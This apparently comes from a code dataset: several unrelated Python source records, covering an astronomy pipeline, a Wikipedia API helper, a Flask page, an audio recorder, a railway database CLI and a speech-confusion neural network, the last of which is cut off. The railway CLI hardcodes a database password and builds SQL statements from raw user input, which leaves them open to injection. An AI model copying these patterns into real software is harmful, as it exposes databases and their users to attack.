parser.add_option(\"-S\", \"--snap\", type=\"int\", dest=\"snap\", help=\"Snap to run\")\n parser.add_option(\"-T\", \"--threads\", type=\"int\", dest=\"threads\", help=\"Number of threads\")\n\n default = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"ProcessCcdDictionary.paf\")\n overrides = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"lsstSim.paf\")\n config, opts, args = parser.parse_args([default, overrides])\n if len(args) > 0:\n print >> sys.stderr, 'Unrecognized arguments: \"%s\"' % '\", '.join(args)\n sys.exit(1)\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n require(opts.rerun, \"rerun\")\n require(opts.visit, \"visit\")\n require(opts.snap, \"snap\")\n require(opts.threads, \"threads\")\n\n inputs = list()\n for rx in range(5):\n for ry in range(5):\n if (rx,ry) in ((0,0), (0,4), (4,0), (4,4)):\n continue\n raft = \"%d,%d\" % (rx, ry)\n for sx in range(3):\n for sy in range(3):\n sensor = \"%d,%d\" % (sx, sy)\n logName = \"%s.%d%d%d%d.log\" % (opts.rerun, rx, ry, sx, sy)\n inputs.append(Inputs(rerun=opts.rerun, visit=opts.visit, snap=opts.snap,\n raft=raft, sensor=sensor, config=config, log=logName))\n\n pool = multiprocessing.Pool(processes=opts.threads, maxtasksperchild=1)\n pool.map(run, inputs)\n pool.close()\n pool.join()\n","repo_name":"lsst-dm/legacy-pipette","sub_path":"bin/lsstSimPool.py","file_name":"lsstSimPool.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42218270718","text":"import requests\nimport re\n\ndef callAPI(extraParams):\n baseParams = {\n 'format': 'json',\n 'formatversion': '2'\n }\n headers = {\n 'User-Agent': 'CIS*3210 WIKI TEST BOT'\n }\n params = {**baseParams, **extraParams}\n\n r = requests.get('http://en.wikipedia.org/w/api.php', params=params, headers=headers)\n return r.json()\n\ndef searchForPage(title):\n params = {\n 'action': 'opensearch',\n 'search': title\n }\n x = callAPI(extraParams=params)\n return(x)\n\ndef getPageSummary(title, numSentences):\n params = {\n 'action': 'query',\n 'prop': 'extracts',\n 'titles': title,\n 'redirects': 'true',\n 'exintro': '',\n 'explaintext': '',\n 'exsentences': str(numSentences)\n }\n res = callAPI(extraParams=params)\n page = res['query']['pages'][0]['extract']\n return(page)\n\ndef getPageImage(title):\n params = {\n 'action': 'query',\n 'prop': 'pageimages',\n 'titles': title,\n 'redirects': 'true',\n 'piprop':'original',\n 'pilicense':'any'\n }\n res = callAPI(extraParams=params)\n return(res['query']['pages'][0]['original']['source'])\n\ndef getURL(title):\n params = {\n 'action': 'query',\n 'prop': 'info',\n 'titles': title,\n 'redirects': 'true',\n 'inprop': 'url'\n }\n res = callAPI(extraParams=params)\n return res['query']['pages'][0]['canonicalurl']\n\ndef getCategories(title):\n params = {\n 'action': 'query',\n 'prop': 'categories',\n 'titles': title,\n 'redirects': 'true',\n 'cllimit': 'max'\n }\n res = callAPI(extraParams=params)\n return res['query']['pages'][0]['categories']\n\ndef isVideoGame(title):\n categories = getCategories(title)\n for category in categories:\n if bool(re.search(\"video game\", category['title'], re.IGNORECASE)):\n return True\n \n return False","repo_name":"Quantaxer/Game-Backlogger","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18587801564","text":"#!/usr/bin/python3\n\"\"\" Starts a Flash Web Application \"\"\"\nimport os\nimport uuid\nfrom flask import Flask, render_template\n\nfrom models import storage\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.state import State\n\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\" Remove the current SQLAlchemy Session \"\"\"\n storage.close()\n\n\n@app.route('/1-hbnb', strict_slashes=False)\ndef hbnb():\n \"\"\" HBNB is alive! \"\"\"\n states = storage.all(State).values()\n states = sorted(states, key=lambda k: k.name)\n st_ct = []\n for state in states:\n st_ct.append([state, sorted(state.cities, key=lambda k: k.name)])\n amenities = storage.all(Amenity).values()\n amenities = sorted(amenities, key=lambda k: k.name)\n places = storage.all(Place).values()\n places = sorted(places, key=lambda k: k.name)\n ctxt = {\n 'states': st_ct,\n 'amenities': amenities,\n 'places': places,\n 'cache_id': uuid.uuid4()\n }\n return render_template('1-hbnb.html', **ctxt)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"BOSTONE069/AirBnB_clone_v4","sub_path":"web_dynamic/1-hbnb.py","file_name":"1-hbnb.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"41380133904","text":"\nimport sounddevice as sd\nfrom scipy.io.wavfile import write\nimport wavio as wv\n\ndef record_audio_wav(filename, duration=5, sample_rate=44100, channels=2):\n print(f\"Recording for {duration} seconds...\")\n\n # Start recorder with the given values\n recording = sd.rec(int(duration * sample_rate),\n samplerate=sample_rate, channels=channels, dtype='int16')\n\n # Record audio for the given number of seconds\n sd.wait()\n\n # Save the recorded audio as a WAV file using scipy.io.wavfile.write\n write(filename, sample_rate, recording)\n\n # Alternatively, save the recorded audio using wavio\n wv.write(filename, recording, sample_rate, sampwidth=2)\n\n print(f\"Recording saved as {filename}\")\n\nif __name__ == \"__main__\":\n output_filename = \"recorded_audio.wav\"\n recording_duration = 6 # Set the desired recording duration in seconds\n\n record_audio_wav(output_filename, recording_duration)\n\n# import sounddevice as sd\n# from scipy.io.wavfile import write\n# import wavio as wv\n# import keyboard\n\n# def record_audio_wav(filename, duration=5, sample_rate=44100, channels=2):\n# print(f\"Recording for {duration} seconds... Press 'Esc' to stop.\")\n\n# # Initialize an empty array to store the recorded audio\n# recording = []\n\n# def callback(indata, frames, time, status):\n# if status:\n# print(f\"Error in recording: {status}\")\n# else:\n# # Append the recorded audio data to the array\n# recording.extend(indata.copy())\n\n# # Start recorder with the given values\n# with sd.InputStream(callback=callback, channels=channels, samplerate=sample_rate):\n# start_time = sd.get_stream().time\n# while sd.get_stream().time - start_time < duration and not keyboard.is_pressed('esc'):\n# pass # Continue recording until the specified duration or 'Esc' key press\n\n# # Save the recorded audio as a WAV file using scipy.io.wavfile.write\n# write(filename, sample_rate, recording)\n\n# # Alternatively, save the recorded audio using wavio\n# wv.write(filename, recording, sample_rate, sampwidth=2)\n\n# print(f\"Recording saved as {filename}\")\n\n# if __name__ == \"__main__\":\n# output_filename = \"recorded_audio.wav\"\n\n# record_audio_wav(output_filename)\n","repo_name":"vieveks/pingu","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3331792055","text":"import subprocess as sp\nimport pymysql\nimport pymysql.cursors\nimport random\nfrom tabulate import tabulate\n\ndef option2():\n \"\"\"\n Function to implement option 2\n \"\"\"\n print(\"Not implemented\")\n\n\ndef promote():\n \"\"\"\n Function to implement Promote Employee\n \"\"\"\n print(\"-x-x-x-x-x-x- Promote Employee -x-x-x-x-x-x-\")\n while True:\n name = input(\"Name of the employee (Fname Lname): \").split(' ')\n query = \"SELECT * FROM RAILWAY_EMPLOYEES_A WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab):\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Employee <\", name[0], \", \", name[1], \"> not found\")\n while True:\n des = input(\"Promote to: \")\n query = \"SELECT * FROM RAILWAY_EMPLOYEES_B WHERE Designation = '%s'\" % (des)\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab) == 0:\n print(\"Promotion to <\", des,\"> is not possible\")\n else:\n break\n while True:\n transfer = input(\"Transfer to: \")\n query = \"SELECT * FROM STATIONS WHERE StationID = '%s'\" % (transfer)\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab) == 0:\n print(\"Transfer to <\", transfer, \"> is not possible\")\n else:\n break\n query = \"UPDATE RAILWAY_EMPLOYEES_A SET Designation = '%s', StationID = '%s' WHERE FirstName = '%s' AND LastName = '%s'\" %(des, transfer, name[0], name[1])\n cur.execute(query)\n query = \"UPDATE EMPLOYEES_CONTACT_NUMBERS SET Designation = '%s' WHERE FirstName = '%s' AND LastName = '%s'\" %(des, name[0], name[1])\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM RAILWAY_EMPLOYEES_A WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n\ndef pre_postpone():\n \"\"\"\n Function to implement Change DOJ\n \"\"\"\n print(\"-x-x-x-x-x-x- Change DOJ -x-x-x-x-x-x-\")\n while True:\n name = input(\"Name of the passenger (Fname Lname): \").split(' ')\n query = \"SELECT * FROM PASSENGERS WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab):\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Employee <\", name[0], \", \", name[1], \"> not found\")\n date = input(\"Change to (YYYY-MM-DD): \")\n query = \"UPDATE PASSENGERS SET DOJ = '%s', Tier = '%d', SeatNo = '%d' WHERE FirstName = '%s' AND LastName = '%s'\" % (date, random.randint(1, 5), random.randint(1, 65), name[0], name[1])\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM PASSENGERS WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n\ndef renovate():\n \"\"\"\n Renovate a Station or a Train\n \"\"\"\n while True:\n query = input(\"What would you like to renovate? (Station or Train) \")\n if query == \"Station\":\n while True:\n id = input(\"Enter the Station ID: \")\n query = \"SELECT * FROM STATIONS WHERE StationID = '%s'\" % (id)\n cur.execute(query)\n tab =cur.fetchall()\n if len(tab):\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Station <\", id, \"> not found\")\n name = input(\"Enter the new Station Name: \")\n n_id = input(\"Enter the new Station ID: \")\n query = \"UPDATE STATIONS SET StationName = '%s', StationID = '%s' WHERE StationID = '%s'\" % (name, n_id, id)\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM STATIONS WHERE StationID = '%s'\" % (n_id)\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n elif query == \"Train\":\n while True:\n name = input(\"Enter the Train Name: \")\n query = \"SELECT * FROM TRAINS WHERE TrainName = '%s'\" % (name)\n cur.execute(query)\n tab =cur.fetchall()\n if len(tab):\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Train <\", name, \"> not found\")\n n_name = input(\"Enter the new Train Name: \")\n num = int(input(\"Enter the new Train Number: \"))\n query = \"UPDATE TRAINS SET TrainName = '%s', TrainNumber = '%d' WHERE TrainName = '%s'\" % (n_name, num, name)\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM TRAINS WHERE TrainName = '%s'\" % (n_name)\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n else:\n print(\"Please choose a valid option\")\n continue\n\ndef query1():\n query = \"\"\"\n SELECT P.FirstName AS \"First Name\", P.LastName AS \"Last Name\", P.DOB, P.Final, P.Class, P.Tier, P.SeatNo AS \"Seat Number\", P.Age, P.DOJ, P.TrainName AS \"Train Name\"\n FROM PASSENGERS P, PASSENGERS Q \n WHERE P.DOJ = Q.DOJ AND P.Final = Q.Final AND P.FirstName <> Q.FirstName AND P.LastName <> Q.LastName ORDER BY P.DOJ;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query2():\n query = \"\"\"\n SELECT S.StationName AS \"Station Name\", S.StationID AS \"Station ID\", T.Count \n FROM STATIONS S, (\n SELECT COUNT(*) AS \"Count\", StationID \n FROM RUNS_THROUGH \n GROUP BY StationID \n ORDER BY COUNT(*) DESC \n LIMIT 1\n ) T \n WHERE S.StationID = T.StationID;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query3():\n query = \"\"\"\n SELECT B.QuartersNo AS \"Quarters Number\", COUNT(*) AS \"Number of Residents\" \n FROM RAILWAY_EMPLOYEES_A A JOIN RAILWAY_EMPLOYEES_B B ON A.Designation = B.Designation \n GROUP BY B.QuartersNo;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query4():\n query = \"\"\"\n SELECT FirstName AS \"First Name\", LastName AS \"Last Name\", Designation \n FROM RAILWAY_EMPLOYEES_A \n WHERE StationID = \"BCT\";\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\ndef query5():\n query = \"\"\"\n SELECT T.TrainNumber AS \"Train Number\", R.TrainName AS \"Train Name\" \n FROM RUNS_THROUGH R, RUNS_THROUGH S, TRAINS T \n WHERE R.TrainName = S.TrainName AND R.StationID=\"SEC\" AND S.StationID=\"BCT\" AND R.TrainName = T.TrainName;\n \"\"\"\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt=\"psql\"))\n return\n\n\ndef dispatch(ch):\n \"\"\"\n Function that maps helper functions to option entered\n \"\"\"\n\n if(ch == 1):\n query1()\n elif(ch == 2):\n query2()\n elif(ch == 3):\n query3()\n elif(ch == 4):\n query4()\n elif(ch == 5):\n query5()\n elif(ch == 6):\n renovate()\n elif(ch == 7):\n promote()\n elif(ch == 8):\n pre_postpone()\n else:\n print(\"Error: Invalid Option\")\n\n\n# Global\nwhile(1):\n tmp = sp.call('clear', shell=True)\n \n # Can be skipped if you want to hardcode username and password\n # username = input(\"Username: \")\n # password = input(\"Password: \")\n\n try:\n # Set db name accordingly which have been create by you\n # Set host to the server's address if you don't want to use local SQL server \n con = pymysql.connect(host='localhost',\n port=3306,\n user=\"root\",\n password=\"Babloo@2003\",\n db='RAILWAY',\n cursorclass=pymysql.cursors.DictCursor)\n tmp = sp.call('clear', shell=True)\n\n if(con.open):\n print(\"Connected\")\n else:\n print(\"Failed to connect\")\n\n tmp = input(\"Enter any key to CONTINUE>\")\n\n with con.cursor() as cur:\n while(1):\n tmp = sp.call('clear', shell=True)\n print(\"1. Query 1\") \n print(\"2. Query 2\")\n print(\"3. Query 3\")\n print(\"4. Query 4\")\n print(\"5. Query 5\")\n print(\"6. Renovate\") \n print(\"7. Promote Employee\") \n print(\"8. Change DOJ\") \n print(\"9. Logout\")\n ch = int(input(\"Enter choice> \"))\n tmp = sp.call('clear', shell=True)\n if ch == 9:\n exit()\n else:\n dispatch(ch)\n tmp = input(\"Enter any key to CONTINUE>\")\n\n except Exception as e:\n tmp = sp.call('clear', shell=True)\n print(e)\n print(\"Connection Refused: Either username or password is incorrect or user doesn't have access to database\")\n tmp = input(\"Enter any key to CONTINUE>\")\n","repo_name":"SasidharChavali/DnA_Railway-Miniworld-CLI","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27979307253","text":"from src.data_loader import DataLoader\nimport pickle\nimport torch\nfrom torch import nn, optim, utils\nimport torch.nn.functional as F\nimport torch.utils.data\nimport numpy as np\nimport more_itertools\nfrom sklearn.metrics import confusion_matrix, roc_curve\nfrom matplotlib import pyplot\n\nclass FFNN(nn.Module):\n\t\"\"\"\n\tArchitecture definition for fully-connected neural network\n\t\"\"\"\n\tdef __init__(self, forward_context, backward_context, embed_dim, phoneme_count, error_weight):\n\t\tsuper().__init__()\n\n\t\t# Parameters\n\t\tself.forward_context = forward_context\n\t\tself.backward_context = backward_context\n\t\tself.embed_dim = embed_dim\n\t\tself.phoneme_count = phoneme_count\n\t\tself.error_weight = error_weight\n\n\t\t# Layers\n\t\tself.embed = nn.Embedding(self.phoneme_count, self.embed_dim)\n\t\tself.linear1 = nn.Linear(self.embed_dim * (self.forward_context + self.backward_context + 1), 512)\n\t\tself.linear2 = nn.Linear(512, 256)\n\t\tself.linear3 = nn.Linear(256, 256)\n\t\tself.linear4 = nn.Linear(256, 128)\n\t\tself.linear5 = nn.Linear(128, 128)\n\t\tself.linear6 = nn.Linear(128, 64)\n\t\tself.linear7 = nn.Linear(64, 64)\n\t\tself.linear8 = nn.Linear(64, 1)\n\n\tdef forward(self, inputs):\n\t\tout = self.embed(inputs)\n\t\tout = torch.reshape(out, (-1, self.embed_dim * (self.forward_context + self.backward_context + 1)))\n\t\tout = F.relu(self.linear1(out))\n\t\tout = F.relu(self.linear2(out))\n\t\tout = F.relu(self.linear3(out))\n\t\tout = F.relu(self.linear4(out))\n\t\tout = F.relu(self.linear5(out))\n\t\tout = F.relu(self.linear6(out))\n\t\tout = F.relu(self.linear7(out))\n\t\tout = torch.sigmoid(self.linear8(out))\n\n\t\treturn out\n\n\tdef save(self, path):\n\t\t\"\"\"\n\t\tSaves model to a file.\n\t\t\n\t\t:param path: path to file where to save model\n\t\t\"\"\"\n\t\tsettings = {'model': FFNN(self.forward_context, self.backward_context, self.embed_dim, \n\t\t\tself.phoneme_count, self.error_weight), 'state_dict': self.state_dict()}\n\t\ttorch.save(settings, path)\n\n\t@classmethod\n\tdef load(cls, path):\n\t\t\"\"\"\n\t\tLoads model (oppposite of 'save' function).\n\n\t\t:param path: path to file where model is saved\n\t\t\"\"\"\n\t\tfile = torch.load(path)\n\t\tmodel = file['model']\n\t\tmodel.load_state_dict(file['state_dict'])\n\t\treturn model\n\ndef data_transformer(data, forward_context, backward_context, vocab_size):\n\t\"\"\"\n\tGiven list of list of phonemes representing phrases, as well as binary labels specifying \n\twhether the phoneme was transcribed correctly, splits into smaller lists with appropriate \n\tpadding to form uniformly-sized tensor\n\t\n\t:param data: the data which padding should be applied to (tensor with input and output)\n\t:param forward_context: the amount of padding to add after the last phoneme\n\t:param backward_context: the amount of padding to add before the first phoneme\n\t\"\"\"\n\tSTART_TOKEN = vocab_size - 2 # TO DO: double check these subtractions\n\tEND_TOKEN = vocab_size - 1\n\tstart_padding = forward_context\n\tend_padding = backward_context\n\n\tx, y = data\n\t\n\tinputs = []\n\tfull_phrases = []\n\tfor phrase in x:\n\t\tpadded_phrase = [START_TOKEN] * start_padding + phrase + [END_TOKEN] * end_padding\n\t\tnew_sub_phrases = list(more_itertools.windowed(padded_phrase, n = 1 + start_padding + end_padding))\n\t\tinputs.extend(new_sub_phrases)\n\t\tfull_phrases.extend([phrase] * len(new_sub_phrases))\n\t\n\tinputs = torch.tensor(inputs, dtype = torch.int64)\n\ttargets = torch.tensor(np.concatenate(y), dtype = torch.float).reshape(-1, 1)\n\n\treturn inputs, targets, full_phrases\n\ndef phonemes_to_phrase(show_transcription = True):\n\t\"\"\"\n\tReturns a dictionary that converts a list of phonemes into the English phrase that created it \n\t\n\t:param show_transcription: Whether ground truth phrases or both ground truth phrases and transcription should be shown\n\t\"\"\"\n\n\tfrom align_phonemes import load_data, load_phonemes, text2phonemes\n\tfrom src.phonemes import DATA_DIR, FILES, PHONEME_OUT\n\n\ttrue_phrases, transcribed_phrases = load_data(DATA_DIR, FILES)\n\tphoneme_dictionary = load_phonemes(PHONEME_OUT)\n\t\n\tif show_transcription:\n\t\tphoneme2phrase = {text2phonemes(true_phrases[i], phoneme_dictionary) : (true_phrases[i], transcribed_phrases[i]) for i in range(len(true_phrases))}\n\telse:\n\t\tphoneme2phrase = {text2phonemes(phrase, phoneme_dictionary) : phrase for phrase in true_phrases}\n\n\treturn phoneme2phrase\n\ndef ROC(y_target, y_probability, path):\n\t\"\"\"\n\tReturns data to plot ROC curve\n\n\t:params y_target: The true label\n\t:params y_probability: The predicted probability\n\t:params path: Where to save the text file with ROC curve data\n\t\"\"\"\n\tfpr, tpr, thresholds = roc_curve(y_true = y_target, y_score = y_probability)\n\n\twith open(path, 'w') as f:\n\t\tf.write('FPR,TPR,THRESHOLDS')\n\t\tfor i in range(1, len(fpr), 500): # Ignoring first row due to arbitrary calculation, skipping rows for small file\n\t\t\tf.write('\\n' + str(fpr[i]) + ',' + str(tpr[i]) + ',' + str(thresholds[i]))\n\n\treturn fpr, tpr, thresholds\n\ndef evaluate_model(model, validation_data, forward_context, backward_context, vocab_size, \n\terror_weight, show_transcription, roc = None, decoder = None, phrase_count = 0):\n\t\"\"\"\n\tHelper function to evaluate trained model on validation (or test) data\n\n\t:param model: trained model to use for predictions\n\t:param validation_data: dataloader with input and ground truth pairs\n\t:param forward_context: Number of phonemes after (context)\n\t:param backward_context: Number of phonemes before (context)\n\t:param vocab_size: Number of token types\n\t:param error_weight: Multiplier for the penalty for not identifying errors correctly vs. identifying non-errors correctly\n\t:param show_transcription: Whether ground truth phrases or both ground truth phrases and transcription should be shown\n\t:param roc: Whether to write ROC curve information to a file (provide path if so)\n\t:param decoder: Dictionary with integers as keys and phonemes as values; must be provided if phrases = True\n\t:param phrases: Number of maximum and minimum predicted error phrases to print\n\t\"\"\"\n\n\tval_targets = torch.tensor([])\n\tval_predictions = torch.tensor([])\n\tval_inputs = torch.tensor([], dtype = torch.int64)\n\tval_full_phrases = []\n\n\tfor minibatch in validation_data:\n\t\tnew_inputs, new_targets, new_full_phrases = data_transformer(minibatch, forward_context, backward_context, vocab_size)\n\t\tnew_predictions = model(new_inputs)\n\t\tval_targets = torch.cat((val_targets, new_targets))\n\t\tval_predictions = torch.cat((val_predictions, new_predictions))\n\t\tval_inputs = torch.cat((val_inputs, new_inputs))\n\t\tval_full_phrases.extend(new_full_phrases)\n\n\tif phrase_count > 0 and decoder:\n\t\tsort_ids = np.argsort(val_predictions.detach().numpy().ravel())\n\t\tphoneme2phrase = phonemes_to_phrase(show_transcription)\n\n\t\tprint('######################################################################')\n\t\tprint('Top', str(phrase_count), 'Predicted Least Confusing Phrases')\n\t\tprint('Predicted Confusion:')\n\t\tprint(val_predictions.detach().numpy()[sort_ids[:phrase_count]])\n\t\t\n\t\tprint('Phrases:')\n\t\tphrases = val_inputs.detach().numpy()[sort_ids[:phrase_count]]\n\t\tprint(phrases)\n\t\t\n\t\tprint('Translated Phrases:')\n\t\tprint(np.vectorize(decoder.get)(phrases))\n\n\t\tprint('English Phrases (True, Transcribed):')\n\t\tphoneme_list = [[decoder[integer] for integer in val_full_phrases[phrase]] for phrase in sort_ids[:phrase_count]]\n\t\tprint([phoneme2phrase[' '.join(phonemes)] for phonemes in phoneme_list])\n\t\t\n\t\tprint('Actual Confusion?')\n\t\tprint(val_targets.detach().numpy()[sort_ids[:phrase_count]])\n\n\t\tprint('######################################################################')\n\t\tprint('Top', str(phrase_count), 'Predicted Most Confusing Phrases')\n\t\tprint('Predicted Confusion:')\n\t\tprint(np.flip(val_predictions.detach().numpy()[sort_ids[-phrase_count:]], axis = 0))\n\t\t\n\t\tprint('Phrases:')\n\t\tphrases = np.flip(val_inputs.detach().numpy()[sort_ids[-phrase_count:]], axis = 0)\n\t\tprint(phrases)\n\t\t\n\t\tprint('Translated Phrases:')\n\t\tprint(np.vectorize(decoder.get)(phrases))\t\t\n\t\t\n\t\tprint('English Phrases (True, Transcribed):')\n\t\tphoneme_list = np.flip([[decoder[integer] for integer in val_full_phrases[phrase]] for phrase in sort_ids[-phrase_count:]], axis = 0)\n\t\tprint([phoneme2phrase[' '.join(phonemes)] for phonemes in phoneme_list])\n\n\t\tprint('Actual Confusion?')\n\t\tprint(np.flip(val_targets.detach().numpy()[sort_ids[-phrase_count:]], axis = 0))\n\n\tif roc:\n\t\tROC(val_targets.detach().numpy(), val_predictions.detach().numpy(), roc)\n\n\tval_weights = torch.where(val_targets == 1, torch.tensor(error_weight, dtype = torch.float), torch.tensor(1, dtype = torch.float))\n\tvalidation_loss = float(F.binary_cross_entropy(val_predictions, val_targets, weight = val_weights, reduction = 'sum').detach()) / len(val_predictions)\n\ttn, fp, fn, tp = confusion_matrix(y_true = val_targets.detach().numpy(), y_pred = np.round(val_predictions.detach().numpy())).ravel()\n\n\treturn validation_loss, tn, fp, fn, tp\n\ndef train(model_parameters):\n\t\"\"\"\n\tTrains neural network given a dictionary of parameters with the following values.\n\n\t:param data_dir: Where transcripts are stored\n\t:param phoneme_out: Phoneme translation file\n\t:param forward_context: Number of phonemes after (context)\n\t:param backward_context: Number of phonemes before (context)\n\t:param embed_dim: Number of dimensions in phoneme embedding\n\t:param num_epochs: Number of epochs to train neural network for\n\t:param batch_size: Number of phrases to process at once (split into phonemes)\n\t:param error_weight: Multiplier for the penalty for not identifying errors correctly vs. identifying non-errors correctly\n\t:param weights_path: Location where to save models during training\n\t:param print_batch: Frequency with which to print updates\n\t:param loss_multiplier: Multiplying constant to make reading loss values easier\n\t:param save_epoch: Model is saved at any multiple of this number of epochs\n\t\"\"\"\n\t#Unpacking variables\n\tDATA_DIR = model_parameters['data_dir']\n\tPHONEME_OUT = model_parameters['phoneme_out']\n\tforward_context = model_parameters['forward_context']\n\tbackward_context = model_parameters['backward_context']\n\tembed_dim = model_parameters['embed_dim']\n\tnum_epochs = model_parameters['num_epochs']\n\tbatch_size = model_parameters['batch_size']\n\terror_weight = model_parameters['error_weight']\n\tweights_path = model_parameters['weights_path']\n\tprint_batch = model_parameters['print_batch']\n\tloss_multiplier = model_parameters['loss_multiplier']\n\tsave_epoch = model_parameters['save_epoch']\n\n\t# Instantiation\n\tprint('Setting everything up...')\n\tvocab_size = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'full', 'train', batch_size = batch_size).vocab_size + 2 # Adding 2 for start/end padding\n\ttraining_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'train', batch_size = batch_size)\n\tvalidation_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'val', batch_size = batch_size)\n\n\tmodel = FFNN(forward_context = forward_context, backward_context = backward_context, embed_dim = embed_dim, phoneme_count = vocab_size, error_weight = error_weight)\n\topt = optim.Adam(model.parameters())\n\n\t# Model training\n\tprint('Starting training!')\n\ti = 1\n\tbest_validation_loss = np.inf\n\n\twhile i <= num_epochs:\n\n\t\ttraining_loss = 0\n\t\tmb = 1\n\t\tpredictions_made = 0\n\n\t\tprint('######################################################################', '\\nEpoch', \n\t\t\ti, '\\n######################################################################')\n\n\t\tfor minibatch in training_data:\n\t\t\topt.zero_grad()\n\n\t\t\tinputs, targets, _ = data_transformer(minibatch, forward_context, backward_context, vocab_size)\n\t\t\tpredictions = model(inputs)\n\t\t\tweights = torch.where(targets == 1, torch.tensor(error_weight, dtype = torch.float), torch.tensor(1, dtype = torch.float))\n\t\t\tloss = F.binary_cross_entropy(predictions, targets, weight = weights, reduction = 'sum')\n\n\t\t\tloss.backward()\n\t\t\topt.step()\n\n\t\t\ttraining_loss += float(loss.detach())\n\t\t\t\n\t\t\tmb += 1\n\t\t\tpredictions_made += len(predictions)\n\n\t\t\tif mb % print_batch == 0:\n\t\t\t\tprint('Minibatch', mb, 'Cumulative Training Loss:', training_loss / predictions_made * loss_multiplier)\n\t\t\t\ttn, fp, fn, tp = confusion_matrix(y_true = targets.detach().numpy(), y_pred = np.round(predictions.detach().numpy())).ravel()\n\t\t\t\tprint('TN:', tn, '| FP:', fp, '| FN:', fn, '| TP:', tp, '| Accuracy:', (tn + fn) / (tn + fp + fn + tp))\n\n\t\tvalidation_loss, tn, fp, fn, tp = evaluate_model(model, validation_data, forward_context, backward_context, vocab_size, error_weight)\n\n\t\tif i % save_epoch == 0:\n\t\t\tlocation = weights_path + 'epoch_' + str(i) + '_' + str(round(validation_loss * loss_multiplier, 3)) + '.weights'\n\t\t\tmodel.save(location)\n\n\t\tprint('######################################################################', '\\nEpoch', i, \n\t\t\t'Training Loss:', training_loss / predictions_made * loss_multiplier, \n\t\t\t'| Validation Loss:', validation_loss * loss_multiplier)\n\t\tprint('TN:', tn, '| FP:', fp, '| FN:', fn, '| TP:', tp, '| Accuracy:', (tn + fn) / (tn + fp + fn + tp))\n\n\t\ti += 1\n\t\ndef investigate_model(model_parameters, file):\n\t\"\"\"\n\tGiven a trained model name, outputs its performance on validation (test) data\n\n\t:param model_parameters: dictionary with model parameters:\n\t\tUses data directory, phoneme file, weights_path, batch size, loss_multiplier, and ROC location (where to write file)\n\t:param file: file path where model is saved\n\t\"\"\"\n\tDATA_DIR = model_parameters['data_dir']\n\tPHONEME_OUT = model_parameters['phoneme_out']\n\tbatch_size = model_parameters['batch_size']\n\tloss_multiplier = model_parameters['loss_multiplier']\n\tweights_path = model_parameters['weights_path']\n\troc = model_parameters['roc_location']\n\n\tprint('Hold on. Fetching results!')\n\n\tvalidation_data = DataLoader(DATA_DIR, PHONEME_OUT, 'hypothesis', 'binary', 'test', batch_size = batch_size)\n\tint_to_phoneme = dict((v,k) for k,v in validation_data.phoneme_to_int.items())\n\n\tmodel = FFNN.load(weights_path + file)\n\tvalidation_loss, tn, fp, fn, tp = evaluate_model(model, validation_data, model.forward_context, \n\t\tmodel.backward_context, model.phoneme_count, model.error_weight, roc = 